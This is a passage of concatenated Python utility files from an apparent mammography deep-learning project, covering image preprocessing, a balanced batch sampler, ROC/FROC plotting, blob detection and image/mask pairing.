png_array2D = (png_array2D > 0).astype(np.uint8)
print(np.unique(png_array2D))
png_array3D = png_array2D.reshape((1,) + png_array2D.shape)
sitk_image_3d = sitk.GetImageFromArray(png_array3D)
return sitk_image_3d
def resize_png(png_file, target_h):
"""Resize png to target_h x target_h. Pad on the right by zero if non-square
Args:
png_file: input png file
target_h: target new height
Returns:
"""
output_png_file = png_file + '_{}x{}.png'.format(target_h, target_h)
image_array = plt.imread(png_file, -1)
h, w = image_array.shape
assert h >= w
target_w = int(target_h / h * w)
image_array_new = cv2.resize(image_array, (target_w, target_h), cv2.INTER_AREA)
canvas = np.zeros((target_h, target_h))
canvas[:target_h, :target_w] = image_array_new
plt.imshow(canvas)
print(output_png_file)
cv2.imwrite(output_png_file, canvas)
class ClaheConverter(object):
"""Batch apply CLAHE to all files in a search path
Args:
image_search_path:
output_dir:
"""
def __init__(self, image_search_path, output_dir):
self.image_files = glob2.glob(image_search_path)
self.output_dir = output_dir
@staticmethod
def apply_clahe(image_array, clipLimit=2.0, tileGridSize=(8,8)):
"""Apply Contrast Limited Adaptive Histogram Equalization
Args:
image_array:
clipLimit:
tileGridSize:
Returns:
image_array_clahe:
"""
clahe = cv2.createCLAHE(clipLimit=clipLimit, tileGridSize=tileGridSize)
image_array_clahe = clahe.apply(image_array)
return image_array_clahe
def deploy(self, clipLimit=2.0, tileGridSize=(8,8)):
fileio.maybe_make_new_dir(self.output_dir)
for image_file in tqdm(sorted(self.image_files)):
image_array = plt.imread(image_file, -1)
image_array = self.apply_clahe(image_array, clipLimit=clipLimit, tileGridSize=tileGridSize)
output_file_path = os.path.join(self.output_dir, os.path.basename(image_file))
cv2.imwrite(output_file_path, image_array)
class NormalizePathces(object):
"""Normalize patches
Args:
min_pct:
max_pct:
verbose: whether to output debuging message
target_shape:
Methods:
process: process numpy array
batch_process: with file io
"""
def __init__(self, min_pct=0, max_pct=100, debug=False, target_shape=None):
self.min_pct = min_pct
self.max_pct = max_pct
self.debug = debug
self.target_shape = target_shape
def convert_to_gray(self, patch_array):
return cv2.cvtColor(patch_array, cv2.COLOR_BGR2GRAY)
def crop_or_pad(self, patch_array):
if self.target_shape is not None:
patch_array = augmentation.center_crop_or_pad(patch_array,
target_shape=self.target_shape)
return patch_array
def process(self, patch_array):
if np.percentile(patch_array, 0) < 5:
a_min = np.percentile(patch_array[patch_array > 5], 10)
else:
a_min = np.percentile(patch_array[patch_array > 5], self.min_pct)
a_max = np.percentile(patch_array[patch_array > 5], self.max_pct)
if self.debug:
print('amin {} amx {}'.format(a_min, a_max))
patch_array = np.clip(patch_array, a_min=a_min, a_max=a_max)
return (((patch_array - a_min) / (a_max - a_min)) * 255).astype(np.uint8)
def load_image(self, patch_path):
return fileio.load_image_to_array(patch_path)
def get_output_path(self, patch_path, path_converter_fn):
return path_converter_fn(patch_path)
def write(self, output_path, patch_array, write_rgb=False):
fileio.maybe_make_new_dir(os.path.dirname(output_path))
if write_rgb:
patch_array = np.dstack([patch_array] * 3)
cv2.imwrite(output_path, patch_array)
def batch_process(self, input_search_path, path_converter_fn=None, dryrun=True, write_rgb=False):
"""
Args:
input_search_path:
path_converter_fn:
dryrun:
write_rgb:
Returns:
"""
patch_paths = glob2.glob(input_search_path)
for patch_path in tqdm(patch_paths[:]):
patch_array = self.load_image(patch_path)
patch_array = self.convert_to_gray(patch_array)
patch_array = self.crop_or_pad(patch_array)
patch_array = self.process(patch_array)
output_path = self.get_output_path(patch_path, path_converter_fn)
if dryrun:
print('write to {}'.format(output_path))
else:
self.write(output_path, patch_array, write_rgb=write_rgb)
def binarize_mask(search_path, rename_fn=None):
if rename_fn is None:
rename_fn = lambda x: x.replace('mask.png', 'binary_mask.png')
for filepath in tqdm(glob2.glob(search_path)):
print(filepath)
image_array = plt.imread(filepath, -1)
binary_array = (image_array > 0).astype(np.uint8)
new_filepath = rename_fn(filepath)
cv2.imwrite(new_filepath, binary_array)
if __name__ == '__main__':
binarize_mask(
'/data/pliu/data/inbreast/calc_patches_ignore_single_point/train_mini/**/*mask.png',
rename_fn=None
)
<file_sep>import torch
import numpy as np
import copy
import re
is_torchvision_installed = True
try:
import torchvision
except:
is_torchvision_installed = False
import torch.utils.data
import random
def find_all_index(arr, item):
return [i for i, a in enumerate(arr) if a == item]
class BalancedBatchSampler(torch.utils.data.sampler.Sampler):
def __init__(self, dataset, labels=None, type='single_label'):
self.labels = labels
self.dataset = dict()
self.balanced_max = 0
# Save all the indices for all the classes
if type == 'single_label':
for idx in range(0, len(dataset)):
l = self._get_label(dataset, idx)
label = str(l)
if label not in self.dataset:
self.dataset[label] = list()
self.dataset[label].append(idx)
self.balanced_max = len(self.dataset[label]) \
if len(self.dataset[label]) > self.balanced_max else self.balanced_max
elif type == 'multi_label':
for idx in range(0, len(dataset)):
label = self._get_label(dataset, idx)
label_index = find_all_index(label, 1)
label_temp = np.zeros((len(label_index), len(label))).astype(int)
for i in range(len(label_index)):
label_temp[i, label_index[i]] = 1
for l in label_temp:
label = str(l)
if label not in self.dataset:
self.dataset[label] = list()
self.dataset[label].append(idx)
self.balanced_max = len(self.dataset[label]) \
if len(self.dataset[label]) > self.balanced_max else self.balanced_max
# Oversample the classes with fewer elements than the max
self.dataset_b = copy.deepcopy(self.dataset)
for label in self.dataset:
while len(self.dataset[label]) < self.balanced_max:
self.dataset[label].append(random.choice(self.dataset[label]))
self.keys = list(self.dataset.keys())
self.currentkey = 0
self.indices = [-1] * len(self.keys)
print(self.balanced_max, self.keys)
def __iter__(self):
while self.indices[self.currentkey] < round(0.8*self.balanced_max) - 1:
self.indices[self.currentkey] += 1
yield self.dataset[self.keys[self.currentkey]][self.indices[self.currentkey]]
self.currentkey = (self.currentkey + 1) % len(self.keys)
for label in self.dataset_b:
self.dataset[label] = []
while len(self.dataset[label]) < self.balanced_max:
self.dataset[label].append(random.choice(self.dataset_b[label]))
print(self.dataset[label])
self.keys = list(self.dataset.keys())
self.currentkey = 0
self.indices = [-1] * len(self.keys)
def _get_label(self, dataset, idx, labels=None):
if self.labels is not None:
return self.labels[idx].item()
else:
# Trying guessing
dataset_type = type(dataset)
if is_torchvision_installed and dataset_type is torchvision.datasets.MNIST:
return dataset.train_labels[idx].item()
elif is_torchvision_installed and dataset_type is torchvision.datasets.ImageFolder:
return dataset.imgs[idx][1]
elif 'BM' in dataset.df.columns:
label_str = dataset.df.BM[idx]
# elif 'Shape' in dataset.df.columns:
# label_str = dataset.df.Shape[idx]
# elif 'Margin' in dataset.df.columns:
# label_str = dataset.df.Margin[idx]
# label_ls = [int(i) for i in re.findall("\d+", label_str)]
try:
label_ls = int(label_str)
except:
print(dataset.df.crop_512_path[idx])
return label_ls
else:
raise Exception("You should pass the tensor of labels to the constructor as second argument")
def __len__(self):
return self.balanced_max * len(self.keys)<file_sep>"""
This file contains common utility functions for drawing ROC curves
"""
import ast
import glob
import glob2
import json
import re
import numpy as np
import os
# matplotlib.use('Agg') # use non-interactive backend
from matplotlib import pylab as plt
from sklearn import metrics
import itertools
from projects.drutils import fileio
def get_ax(rows=1, cols=1, size=(16, 16)):
"""Quick control of fig size and layout
Return a Matplotlib Axes array to be used in all visualizations in the notebook.
Provide a central point to control graph sizes.
Adjust the size attribute to control how big to render images
"""
_, ax = plt.subplots(rows, cols, figsize=(size[0] * cols, size[1] * rows))
return ax
def find_threshold(fpr, tpr, thresholds, target_fpr):
"""
Find the threshold corresponding to a target FPR (target_fpr)
Args:
fpr: List of FPR
tpr: List of TPR
thresholds: List of thresholds
target_fpr: Target FPR at which to operate
Returns:
target_thr: Threshold that produces the target FPR
target_tpr: TPR at the target FPR
"""
assert(len(fpr) == len(thresholds))
fpr = np.asarray(fpr)
thresholds = np.asarray(thresholds)
# Find index such that fpr[idx-1] < target_fpr < fpr[idx]
idx = fpr.searchsorted(target_fpr)
# print('idx=', idx)
if idx == len(fpr):
print("Target FPR out of range. Maximum FPR={} at threshold={}".format(fpr[-1], thresholds[-1]))
target_thr = thresholds[-1]
elif idx == 0:
print("Target FPR out of range. Minimum FPR={} at threshold={}".format(fpr[0], thresholds[0]))
target_thr = thresholds[0]
else:
left_fpr = fpr[idx-1]
right_fpr = fpr[idx]
interpolation_frac = (target_fpr - left_fpr) / (right_fpr - left_fpr)
left_tpr = tpr[idx-1]
right_tpr = tpr[idx]
target_tpr = left_tpr + (right_tpr - left_tpr) * interpolation_frac
left_thr = thresholds[idx-1]
right_thr = thresholds[idx]
target_thr = min(1.0, max(0.0, left_thr + (right_thr - left_thr) * interpolation_frac))
return target_thr, target_tpr
def plot_crosshair(coordinates, ax=None, **kwargs):
"""
Plot crosshair at target cordinate
Args:
coordinates: the x, y coordinates of the point to be plotted
Return:
crosshair_handles: handles to crosshair lines
"""
x, y = coordinates
if ax is None:
ax = plt.gca()
horiz = ax.axhline(y, **kwargs)
vert = ax.axvline(x, **kwargs)
annotation = '({:.2f},{:.2f})'.format(x, y)
plt.annotate(annotation, (x + 0.01, y - 0.04), color=kwargs['color'])
crosshair_handles = horiz, vert
return crosshair_handles
def plot_inset(fig, auc_list, title='auc', xlabel='ckpt', location=[0.55, 0.25, 0.3, 0.3]):
left, bottom, width, height = location
ax1 = fig.add_axes([left, bottom, width, height])
ax1.plot(auc_list, color='k', marker='o')
plt.xlabel(xlabel)
plt.title(title)
def plot_roc_from_txt(fig, filename, idx=0, target_fpr=0.5, show_crosshair=True, plot_type='plot', title=''):
""" Plot ROC curve from a text file
Args:
filename: Each line of the text file contains a prediction in [0, 1] and a label, separated by comma
idx: optional, index number of the current curve
Return:
auc: Area under ROC curve
"""
# get predictions and labels lists
preds = []
labels = []
image_ids = []
with open(filename, 'r') as infile:
for line in infile:
items = [item.strip() for item in line.split(',')]
pred, label = items[0], items[1]
preds.append(float(pred))
labels.append(int(label))
preds = np.array(preds)
labels = np.array(labels)
num_neg_label = (labels == 0).sum()
# plot/add to ROC curve
fpr, tpr, thresholds = metrics.roc_curve(labels, preds, drop_intermediate=False)
target_thr, target_tpr = find_threshold(fpr, tpr, thresholds, target_fpr)
auc = metrics.auc(fpr, tpr)
data_label = '{}. {}: {:.3f}'.format(idx, os.path.basename(filename), auc)
plt.figure(fig.number)
plt.plot([0, 1], [0, 1], color='gray', lw=1, linestyle='--')
xs = fpr
if plot_type == 'plot':
plt.plot(xs, tpr, label=data_label)
elif plot_type == 'scatter':
plt.scatter(xs, tpr, s=80, facecolors='none', edgecolors='b', marker='o', label=data_label)
# plt.tight_layout()
plt.xlim([0, 1.0])
plt.ylim([0, 1.0])
plt.grid(linestyle=':')
lgd = plt.legend(loc='center left', fontsize=12, bbox_to_anchor=(1, 0.5))
plt.xlabel('FPR', fontsize=12)
plt.ylabel('TPR (Recall)', fontsize=12)
plt.title(title, fontsize=18)
if show_crosshair:
coordinates = (target_fpr, target_tpr)
plot_crosshair(coordinates, color='red', lw=1, linestyle='--')
disp_fpr = [0.01, 0.03, 0.05, 0.07, 0.1, 0.2, 0.3, 0.4, 0.5]
disp_thr = [0.0] * len(disp_fpr)
disp_tpr = [0.0] * len(disp_fpr)
annotation = '({:4},{:4},{:4})'.format('FPR', 'TPR', 'Thr')
x, y = coordinates
# Move annotation to top if curve is too low
if y < 0.5:
y = 1.0
plt.annotate(annotation, (x + 0.01, y - 0.12))
for i in range(len(disp_fpr)):
disp_thr[i], disp_tpr[i] = find_threshold(fpr, tpr, thresholds, disp_fpr[i])
print("FPR={}, TPR={:.4f} at threshold={:.4f}".format(disp_fpr[i], disp_tpr[i], disp_thr[i]))
annotation = '({:.2f},{:.2f},{:.3f})'.format(disp_fpr[i], disp_tpr[i], disp_thr[i])
plt.annotate(annotation, (x + 0.01, y - 0.12 - 0.04*(1+i)))
return auc, lgd
def split_with_square_brackets(input_str):
"""
Split a string using "," as delimiter while maintaining continuity within "[" and "]"
Args:
input_str: Input string
Returns:
substrings: List of substrings
"""
substrings = []
bracket_level = 0
current_substr = []
for next_char in (input_str + ","):
if next_char == "," and bracket_level == 0:
substrings.append("".join(current_substr))
current_substr = []
else:
if next_char == "[":
bracket_level += 1
elif next_char == "]":
bracket_level -= 1
current_substr.append(next_char)
return substrings
def update_preds_and_labels(pred, labels_matched, image_id, detected_labels, preds, labels, image_ids):
"""
Convert the matched labels of the prediction bbox to binary label and update all predictions and labels
Args:
pred: Current prediction score
labels_matched: GT labels for which the current prediction is a match
image_id: Current image ID
detected_labels: GT labels that have been detected so far for this image_id
preds: List of all predictions, passed by reference
labels: List of all binary labels, passed by reference
image_ids: List of all image IDs, passed by reference
Returns:
detected_labels: GT labels that have been detected so far for this image_id
"""
num_detected_so_far = len(detected_labels)
detected_labels = detected_labels.union(set(labels_matched))
# If the current prediction contribute to a new match, set label to 1
if len(detected_labels) > num_detected_so_far:
label = 1
for _ in range(len(detected_labels) - num_detected_so_far):
preds.append(float(pred))
labels.append(float(label))
image_ids.append(image_id)
else:
label = 0
preds.append(float(pred))
labels.append(float(label))
image_ids.append(image_id)
return detected_labels
def plot_froc_from_txt(fig, filename, idx=0, target_fpr=0.5, show_crosshair=True, plot_type='plot', title=''):
""" Plot FROC curve from a text file
Args:
filename: Each line of the text file contains a prediction in [0, 1] and a label, separated by comma
idx: optional, index number of the current curve
Return:
auc: Area under ROC curve
"""
# get predictions and labels lists
preds = []
labels = []
image_ids = []
with open(filename, 'r') as infile:
for line in infile:
# items = [item.strip() for item in line.split(',')]
items = [item.strip() for item in split_with_square_brackets(line)]
pred, labels_matched = items[0], items[1]
labels_matched = ast.literal_eval(labels_matched)
try:
image_id = items[2]
except:
raise ValueError('Every line must have image_id for FROC curve generation!')
if float(pred) == 0 and len(labels_matched) == 0:
continue
if image_id not in image_ids:
detected_labels = set()
detected_labels = update_preds_and_labels(pred, labels_matched, image_id, detected_labels, \
preds, labels, image_ids)
preds = np.array(preds)
labels = np.array(labels)
num_unique_image_ids = len(set(image_ids))
num_neg_label = (labels == 0).sum()
# plot/add to ROC curve
fpr, tpr, thresholds = metrics.roc_curve(labels, preds)
fpr, tpr, thresholds = fpr[:-1], tpr[:-1], thresholds[:-1]
# this is equivalent to [(labels[preds > threshold] == 0).sum() / num_image_ids for threshold in thresholds]
neg_per_image = num_neg_label / num_unique_image_ids
fpc = fpr * neg_per_image
# print 'fpr, tpr, thresholds:
target_thr, target_tpr = find_threshold(fpr, tpr, thresholds, target_fpr)
auc = metrics.auc(fpr, tpr)
data_label = '{}. {}: {:.3f}'.format(idx, os.path.basename(filename), auc)
plt.figure(fig.number)
xs = fpc
if plot_type == 'plot':
plt.plot(xs, tpr, label=data_label)
elif plot_type == 'scatter':
plt.scatter(xs, tpr, s=80, facecolors='none', edgecolors='b', marker='o', label=data_label)
plt.tight_layout()
plt.xlim([0, 10.0])
plt.ylim([0, 1.0])
plt.grid(linestyle=':')
lgd = plt.legend(loc='center left', fontsize=12, bbox_to_anchor=(1, 0.5))
plt.xlabel('FP per Image', fontsize=12)
plt.ylabel('TPR (Recall)', fontsize=12)
plt.title(title, fontsize=18)
if show_crosshair:
coordinates = (target_fpr * neg_per_image, target_tpr)
plot_crosshair(coordinates, color='red', lw=1, linestyle='--')
disp_fpr = [0.001, 0.003, 0.005, 0.007, 0.01, 0.02, 0.03, 0.04]
disp_thr = [0.0] * len(disp_fpr)
disp_tpr = [0.0] * len(disp_fpr)
annotation = '({:4},{:4},{:4})'.format('FPPI', 'TPR', 'Thr')
x, y = coordinates
plt.annotate(annotation, (x + 0.01, y - 0.12))
for i in range(len(disp_fpr)):
disp_thr[i], disp_tpr[i] = find_threshold(fpr, tpr, thresholds, disp_fpr[i])
annotation = '({:.2f},{:.2f},{:.2f})'.format(disp_fpr[i] * neg_per_image, disp_tpr[i], disp_thr[i])
plt.annotate(annotation, (x + 0.01, y - 0.12 - 0.04*(1+i)))
return auc, lgd
def plot_froc_from_data_dict(data_dict, output_fig_path=None, fig_title=None,
label_filter='', xlim=(0.1, 50), key_sorter=None, plot_recall=False,
highlight_idx=None, **kwargs):
"""Plot froc curve from a data dict
Args:
data_dict: a dict of dict. Each sub-dict has keys
label: used as legend
data: list of list in the format [[recall, fpc, threshold], ...]
output_fig_path:
fig_title:
label_filter:
xlim:
key_sorter: a function to sort the keys. Default to sorting by last mod time
plot_recall: defaults to False, where a semilogx and a linear plot are plotted side by side.
When plot_recall is True, replcae the linear plot with plot of recall in chronological order
highlight_idx: the idx (counting from 0) of the threshold list to plot trend over time
Returns:
None
"""
fig = plt.figure(figsize=(12, 6))
labels = sorted(set(val['label'] for val in data_dict.values()))
line_styles = ['-', ':', '-.', '--']
if len(labels) > len(line_styles) or len(data_dict) == len(labels):
ls_dict = {label:line_styles[0] for idx, label in enumerate(labels)}
else:
ls_dict = {label:line_styles[idx] for idx, label in enumerate(labels)}
if plot_recall:
plot_fns = [plt.semilogx]
else:
plot_fns = [plt.semilogx, plt.plot]
for idx, plot_func in enumerate(plot_fns):
plt.subplot(1, 2, idx+1)
keys = sorted(data_dict.keys())
# sort by last mod time
key_sorter = key_sorter or (lambda x: os.path.getmtime(x))
try:
keys.sort(key=key_sorter)
except:
# if cannot sort with key_sorter, sort alphabetically by key string
keys.sort(key=str)
mid_recall_list = []
mid_fp_list = []
for key in keys:
label = data_dict[key]['label']
line_style = ls_dict[label]
if 'num_images' in data_dict[key]:
label = '{} (count:{})'.format(label, data_dict[key]['num_images'])
if label_filter in label:
data = data_dict[key]['data']
fpc = [item[1] for item in data]
recall = [item[0] for item in data]
p = plot_func(fpc, recall, marker='.', ls=line_style, label=label)
color = p[0].get_color()
if highlight_idx is not None:
if highlight_idx == 'mid':
highlight_idx = (len(fpc) - 1) // 2
mid_recall_list.append(recall[highlight_idx])
mid_fp_list.append(fpc[highlight_idx])
plt.scatter(fpc[highlight_idx], recall[highlight_idx],
marker='o', s=100, facecolors='none', edgecolors=color)
plt.xlabel('FP per Image')
plt.ylabel('Recall')
plt.title(fig_title)
plt.xlim(xlim)
plt.ylim([0, 1])
plt.grid()
plt.yticks([i / 10.0 for i in range(0, 10)])
plt.grid(b=True, which='major', color='gray', linestyle='-')
plt.grid(b=True, which='minor', color='gray', linestyle='--')
# only plot the legend of the last subplot
plt.legend(loc='best', fancybox=True, framealpha=0.5)
if plot_recall:
# plot on the RHS
ax1 = plt.subplot(122)
ax2 = ax1.twinx()
plot_sharex_series(ax1, ax2, mid_recall_list, mid_fp_list, ylim1=(0, 1), ylim2=(0.1, 10),
xlabel='ckpt', ylabels=('Recall', 'FPC'))
plt.grid()
plt.title('Recall and FPC')
if output_fig_path is not None:
fileio.maybe_make_new_dir(os.path.dirname(output_fig_path))
plt.savefig(output_fig_path, dpi=300) # default dpi is usually 100
plt.close('all')
else:
plt.show()
return fig
def plot_sharex_series(ax1, ax2, data1, data2, t=None, ylim1=None, ylim2=None,
xlabel='', ylabels=('', ''), colors=('tab:red', 'tab:blue')):
""""Plot two data series of different scales on the same graph
Adapted from https://matplotlib.org/gallery/api/two_scales.html
"""
color1, color2 = colors
ylabel1, ylabel2 = ylabels
if not t:
t = range(1, len(data1) + 1)
# plot first series
color = color1
ax1.set_xlabel(xlabel)
ax1.set_ylabel(ylabel1, color=color)
ax1.plot(t, data1, color=color, ls='--', marker='o', markersize=10, markerfacecolor='none')
ax1.tick_params(axis='y', labelcolor=color)
ax1.set_yticks([i / 10.0 for i in range(0, 10)])
ax1.yaxis.grid(color=color, linestyle='--')
ax1.xaxis.grid(color='gray', linestyle='--')
if ylim1:
ax1.set_ylim(ylim1)
# plot second series
color = color2
ax2.set_ylabel(ylabel2, color=color) # we already handled the x-label with ax1
ax2.semilogy(t, data2, color=color, linestyle='--', marker='o', markersize=10, markerfacecolor='none')
ax2.tick_params(axis='y', labelcolor=color)
if ylim2:
ax2.set_ylim(ylim2)
ax2.yaxis.grid(color='black', linestyle='--') # <FIXME> this does not show up. Why?
plt.tight_layout() # otherwise the right y-label is slightly clipped
def batch_plot_froc_json(input_search_path, output_fig_path=None, name='', legend_regex_sub='', **kwargs):
"""Plot json in a directory onto one froc
Args:
input_search_path: glob pattern, such as '/data/log/mammo/calc_train/Mammo_20180318-22h44PM39/froc*json', so
it could be a path to a specific file. It could also be a list of glob patterns, but they should have
the same parent (FROC title uses the parent folder of the first pattern).
output_fig_path:
name: FROC dataset patterns in title
legend_regex_sub: regex pattern to delete from legend labels
Returns:
None
"""
if not isinstance(input_search_path, (list, tuple)):
input_search_path = [input_search_path]
froc_json_path_list = []
for single_search_path in input_search_path:
froc_json_path_list.extend(glob2.glob(single_search_path))
froc_json_path_list = sorted(set(froc_json_path_list))
# generate fig title
input_dir = os.path.dirname(input_search_path[0])
json_dirname = os.path.basename(input_dir.strip(os.sep)) # the last level of folder name
fig_title = '{} FROC {}'.format(name, json_dirname)
data_dict = {}
for froc_json_path in froc_json_path_list:
with open(froc_json_path, 'r') as f_in:
data_dict[froc_json_path] = {}
label = os.path.basename(froc_json_path).replace('.json', '')#.replace(legend_str_omit, '')
label = re.sub(legend_regex_sub, '', label)
data_dict[froc_json_path]['label'] = label
data_dict[froc_json_path]['data'] = json.load(f_in)
plot_froc_from_data_dict(data_dict, output_fig_path, fig_title, **kwargs)
<file_sep>"""
Blob detection with DoG (Difference of Gaussian) and LoG (Laplacian of Gaussian)
"""
from skimage import feature, filters
from skimage.transform import resize
from skimage import morphology
import pandas as pd
import re
import numpy as np
import glob
import glob2
import matplotlib.pylab as plt
import cv2
import os
import dicom
from projects.drutils import data
from projects.drutils import parser
from projects.drutils import fileio
from projects.mammo_seg import inbreast
def calc_dog(img, sigma, k=1.6):
"""Calculate difference of gaussian
Args:
img:
sigma:
k:
Returns:
"""
s1 = filters.gaussian(img, k * sigma)
s2 = filters.gaussian(img, sigma)
dog = s1 - s2
return dog
def get_binary_mask(img, disk_size, option='erode'):
"""Get a binary mask based for input image
Args:
img:
disk_size:
option: currently supported option
'erode'
Returns:
binary_mask:
"""
if disk_size > 0:
th = filters.threshold_otsu(img)
binary_mask = (img > th)
selem = morphology.disk(disk_size)
if option == 'erode':
binary_mask = morphology.binary_erosion(binary_mask, selem=selem)
elif option == 'open':
binary_mask = morphology.binary_opening(binary_mask, selem=selem)
else:
raise ValueError('Unsupported option {}'.format(option))
else:
binary_mask = None
return binary_mask
class LogBlobDetector(object):
"""Blob detector using LoG (Laplacian of Gaussian)"""
def __init__(self, img, disk_size=10, **kwargs):
"""Constructor
Args:
img:
**kwargs: example kwargs include
max_sigma=25, min_sigma=2, num_sigma=3, threshold=0.1
"""
self.img = img
self.disk_size = disk_size
self.max_sigma = kwargs['max_sigma']
self.min_sigma = kwargs['min_sigma']
self.num_sigma = kwargs['num_sigma']
self.threshold = kwargs['threshold']
def detect(self):
"""Detect blobs in image
Returns:
blobs_log_filtered: a list of tuples (x, y, r) that lies within the mask
"""
blobs_log = feature.blob_log(self.img,
max_sigma=self.max_sigma,
min_sigma=self.min_sigma,
num_sigma=self.num_sigma,
threshold=self.threshold)
binary_mask = get_binary_mask(self.img, self.disk_size, option='erode')
if binary_mask is not None:
blobs_log_filtered = []
for blob in blobs_log:
y, x, r = blob
if binary_mask[int(y), int(x)]:
blobs_log_filtered.append((y, x, r))
else:
blobs_log_filtered = blobs_log
return blobs_log_filtered
def detector_batch_deploy(LogBlobDetector, inbreast_name_list):
"""Batch deploy blob detector
Args:
LogBlobDetector:
inbreast_name_list:
Returns:
"""
inbreast_dict = inbreast.generate_inbreast_dict()
for name in inbreast_name_list:
print(name)
# get paths
try:
mask_path = \
list(glob.glob(os.path.join(inbreast_dict['basedir'], 'AllMASK_level2', '_combined', '{}*'.format(name))))[0]
image_path = list(glob.glob(os.path.join(inbreast_dict['basedir'], 'AllPNG', '{}*'.format(name))))[0]
stack_path = list(glob.glob(os.path.join(inbreast_dict['basedir'], 'stack', '{}*'.format(name))))[0]
except:
print('not found {}'.format(name))
continue
# read images
img = plt.imread(image_path, -1)
img_shape = img.shape
img_mask = plt.imread(mask_path, -1)
img_stack = plt.imread(stack_path, -1)
img_overlay = (img_stack[:, img_stack.shape[1] // 2:])
# get eroded binary mask
det = LogBlobDetector(img, max_sigma=25, min_sigma=2, num_sigma=3, threshold=0.1, disk_size=50)
blobs_log = det.detect()
canvas = img_overlay.copy()
for y, x, r in blobs_log:
cv2.circle(canvas, (int(x), int(y)), int(r + 5), color=(102, 255, 0), thickness=2)
# stack image side-by-side for comparison
img_log = np.hstack([canvas, np.dstack([img] * 3)])
plt.imsave(os.path.join(inbreast_dict['basedir'], 'log', '{}_log_th0.1.png'.format(name)), img_log)
if __name__ == "__main__":
inbreast_dict = inbreast.generate_inbreast_dict()
df = pd.read_csv(inbreast_dict['csv_path'])
# loop over all files and save to file
# name_list = df[~ (df['Findings'].str.contains('normal'))]['File Name'][:1]
name_list = df['File Name'].tolist()[:2]
print(name_list)
detector_batch_deploy(LogBlobDetector, name_list)
<file_sep>import random
import colorsys
import numpy as np
def random_colors(N, bright=True):
"""
Generate random colors.
To get visually distinct colors, generate them in HSV space then
convert to RGB.
"""
brightness = 1.0 if bright else 0.7
hsv = [(i / N, 1, brightness) for i in range(N)]
colors = list(map(lambda c: colorsys.hsv_to_rgb(*c), hsv))
random.shuffle(colors)
return colors
def overlay_mask(image, mask, color=(0, 255, 0), alpha=1):
"""Overlay 2d mask on rgb image with color and transparency
Args:
image:
mask:
color:
alpha:
Returns:
"""
assert len(mask.shape) == 2
assert len(image.shape) == 3
assert mask.shape == image.shape[:2]
canvas_opqaue = np.where(np.expand_dims(mask, axis=2),
np.array(color).astype(np.uint8).reshape([1, 1, 3]), image)
canvas = (canvas_opqaue * alpha + image * (1 - alpha)).astype(np.uint8)
return canvas<file_sep>"""Utility classes and functions to crop images to patches"""
import glob
import glob2
import json
import logging
from datetime import datetime
import cv2
import numpy as np
import os
import shutil
import tensorflow as tf
from sklearn.model_selection import train_test_split
from tqdm import tqdm
os.sys.path.append('/data1/MedicalImage/User/xing/SigmaPy')
from projects.drutils import fileio
from projects.drutils import augmentation
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(message)s')
class PairedDictGenerator(object):
def __init__(self, image_search_path, mask_search_path, output_dir,
image_suffix=".tif", mask_suffix='_mask.tif'):
self.output_dir = output_dir
self.image_files = self._find_data_files(image_search_path, image_suffix)
self.mask_files = self._find_data_files(mask_search_path, mask_suffix)
def get_paired_image_and_mask(self, join='inner', key_names=('image', 'mask')):
"""Create paired image and mask files
Find common files in two folders and create dictionary paired_dict. Each key has two keys:
'image': path to the image file
'mask': path to the mask file
Args:
join: {'inner', 'outer', 'left', 'right'}
'inner': find intersection between two lists
'outer': find union of two lists
'left': first list (image list)
'right': second list (mask list)
Returns:
paired_dict: paired_dict[key]['image'] and paired_dict[key]['mask'] is a file
"""
image_key, mask_key = key_names
self.image_dict = {self.get_image_key_fn(filepath):filepath for filepath in self.image_files}
self.mask_dict = {self.get_mask_key_fn(filepath): filepath for filepath in self.mask_files}
if join == 'inner':
keys = set(self.image_dict.keys()) & set(self.mask_dict.keys())
elif join == 'outer':
keys = set(self.image_dict.keys()) | set(self.mask_dict.keys())
elif join == 'left':
keys = set(self.image_dict.keys())
elif join == 'right':
keys = set(self.mask_dict.keys())
else:
raise KeyError('Unsupported join method {}'.format(join))
paired_dict = {}
for key in keys:
paired_dict[key] = {}
paired_dict[key][image_key] = self.image_dict.get(key, '')
paired_dict[key][mask_key] = self.mask_dict.get(key, '')
logging.debug('paired_dict with length {}'.format(len(paired_dict)))
filepath = os.path.join(self.output_dir, 'paired_dict.json')
fileio.maybe_make_new_dir(os.path.dirname(filepath))
with open(filepath, 'w') as f_out:
json.dump(paired_dict, f_out, indent=4, sort_keys=True)
return paired_dict
@staticmethod
def _find_data_files(search_path, suffix):
all_files = glob2.glob(search_path)
return [name for name in all_files if suffix in name]
@staticmethod
def get_image_key_fn(filepath):
"""Get key for paired_dict
Example:
'/media/Data/Data02/Datasets/Mammogram/INbreast/mass_mask/22678646_combined.png'
--> 22678646
Args:
filepath:
Returns:
A string as key in paired_dict
"""
# FIXME: use a generalized method to get key for different dataset
if 'DDSM' in filepath:
return os.path.basename(filepath).split('.')[0]
return os.path.basename(filepath).split('.')[0].split('_')[0]
@staticmethod
def get_mask_key_fn(filepath):
"""Get key for paired_dict
Example:
'/media/Data/Data02/Datasets/Mammogram/INbreast/AllPNG/53586805_e5f3f68b9ce31228_MG_R_CC_ANON.dcm.png'
--> 53586805
Args:
filepath:
Returns:
A string as key in paired_dict
"""
# FIXME: use a generalized method to get key for different dataset
if 'DDSM' in filepath:
return ('_').join(os.path.basename(filepath).split('.')[0].split('_')[:-2])
return os.path.basename(filepath).split('.')[0].split('_')[0]
class VectorizedPairedDictGenerator(PairedDictGenerator):
"""Extended PairedDictGenerator
Each of image_search_path and mask_search_path can be a list of glob search patterns
Below is the doctest:
>>> from pathlib import Path
>>> import os
>>> import shutil
>>> test_path = r'/tmp/test/'
>>> for name in ['1', '2', '3']:
... for folder in ['images', 'mask1', 'mask2']:
... filename = os.path.join(test_path, folder, name + '.png')
... os.makedirs(os.path.dirname(filename), exist_ok=True)
... Path(filename).touch()
>>> image_search_path = os.path.join(test_path, 'images', '*png')
>>> mask_search_path = [os.path.join(test_path, 'mask1', '*png'), os.path.join(test_path, 'mask2', '*png')]
>>> output_dir = test_path
>>> image_suffix=".png"
>>> mask_suffix='.png'
>>> dict = VectorizedPairedDictGenerator(
... image_search_path, mask_search_path,
... output_dir, image_suffix, mask_suffix).get_paired_image_and_mask()
>>> shutil.rmtree(test_path)
"""
def __init__(self, image_search_path, mask_search_path, output_dir,
image_suffix=".tif", mask_suffix='_mask.tif'):
self.output_dir = output_dir
self.image_files = self._find_data_files(image_search_path, image_suffix)
self.mask_files = self._find_data_files(mask_search_path, mask_suffix)
self.is_vector = (
